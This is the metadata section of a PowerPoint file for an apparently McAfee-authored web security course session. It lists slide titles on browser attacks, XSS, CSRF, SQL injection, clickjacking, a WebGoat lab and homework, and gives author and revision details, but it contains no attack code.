      <vt:lpstr>Waterhole Attacks</vt:lpstr>
      <vt:lpstr>SO What’s the SOLUTION?</vt:lpstr>
      <vt:lpstr>USER ATTACKS – COMMON DEFENSES</vt:lpstr>
      <vt:lpstr>SEARCH RESULT ANNOTATION</vt:lpstr>
      <vt:lpstr>SECURE URL SHORTENING SERVICES</vt:lpstr>
      <vt:lpstr>Browser-level attacks</vt:lpstr>
      <vt:lpstr>WEB browser Attack Surface</vt:lpstr>
      <vt:lpstr>Security Features of the modern web Browser</vt:lpstr>
      <vt:lpstr>THE BROWSER EXPLOIT</vt:lpstr>
      <vt:lpstr>CONTENT/SCRIPT OBFUSCATION</vt:lpstr>
      <vt:lpstr>CONTENT/SCRIPT OBFUSCATION</vt:lpstr>
      <vt:lpstr>CONTENT/SCRIPT OBFUSCATION</vt:lpstr>
      <vt:lpstr>Man-in-the-middle-attack</vt:lpstr>
      <vt:lpstr>MAN IN THE BROWSER (MITB)</vt:lpstr>
      <vt:lpstr>DNS SPOOFING</vt:lpstr>
      <vt:lpstr>CLICKJACKING (AKA UI REDRESSING)</vt:lpstr>
      <vt:lpstr>CLICKJACKING EXAMPLE</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection Bis</vt:lpstr>
      <vt:lpstr>SAME Origin Policy ATTACKS</vt:lpstr>
      <vt:lpstr>SAME ORIGIN POLICY</vt:lpstr>
      <vt:lpstr>SAME ORIGIN POLICY</vt:lpstr>
      <vt:lpstr>Cross-site Scripting  (XSS)</vt:lpstr>
      <vt:lpstr>Non-Persistent XSS Example</vt:lpstr>
      <vt:lpstr>Cross-Site REQUEST FORGERY (XSRF)</vt:lpstr>
      <vt:lpstr>Cross-Site REQUEST FORGERY (XSRF) - Example</vt:lpstr>
      <vt:lpstr>Lab 1 – ATTACK THE WEB GOAT!</vt:lpstr>
      <vt:lpstr>ADVANCED HTML5 THREATS</vt:lpstr>
      <vt:lpstr>HTML5 – Benefits to the WEB Designer and user</vt:lpstr>
      <vt:lpstr>HTML5 – Benefits to the Malicious Actor</vt:lpstr>
      <vt:lpstr>HTML5 – Benefits to the Malicious Actor</vt:lpstr>
      <vt:lpstr>HTML5 – New Security Risks</vt:lpstr>
      <vt:lpstr>Homework – Reflected XSS – OPTION 1</vt:lpstr>
      <vt:lpstr>Homework – Reflected XSS – Option 2</vt:lpstr>
      <vt:lpstr>END of SESSION 1</vt:lpstr>
      <vt:lpstr>Questions?</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>McAfee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</dc:title>
  <dc:creator>Cedric_Cochin@McAfee.com</dc:creator>
  <cp:lastModifiedBy>Arthur Liou</cp:lastModifiedBy>
  <cp:revision>554</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-02-20T23:37:52Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-02-24T00:10:44Z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5c228f38-e58a-4872-9950-c3a40a6d38c7</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ContentTypeId">
    <vt:lpwstr>0x0101006B9B79A9E2FEF042B274AEF122A175F0</vt:lpwstr>
  </property>
</Properties>
</file>